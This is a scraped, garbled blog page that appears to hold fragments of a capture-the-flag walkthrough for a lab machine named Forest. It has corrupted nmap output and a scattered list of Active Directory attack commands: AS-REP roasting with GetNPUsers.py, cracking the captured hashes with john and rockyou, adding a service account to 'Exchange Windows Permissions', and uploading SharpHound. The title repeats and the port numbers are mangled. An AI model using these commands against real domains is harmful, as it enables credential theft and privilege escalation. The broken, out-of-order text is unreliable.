ferefinancial.blogg.se

The forest hax
The forest hax










If you know the service/version, please submit the following fingerprint at : Nmap Scan Nmap 7.70 scan initiated Tue Jan 28 21:47:16 2020 as: nmap -sC -sV -oV 10.10.10.161Ĩ8/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 02:55:21Z)ġ39/tcp open netbios-ssn Microsoft Windows netbios-ssnģ89/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)Ĥ45/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)ĥ93/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0ģ268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)ġ service unrecognized despite returning data.

  • net group “Exchange Windows Permissions” svc-alfresco /add.
  • upload /root/Downloads/tools/BloodHound/Ingestors/SharpHound.ps1 C:\tmp\SharpHound.ps1.
  • john –wordlist=/root/Desktop/rockyou.txt hashes.txt.
  • the forest hax

  • GetNPUsers.py HTB.local/ -usersfile /root/Desktop/htb/forest/user.txt -format john -outputfile hashes.txt -dc-ip 10.10.10.161.
  • the forest hax












    The forest hax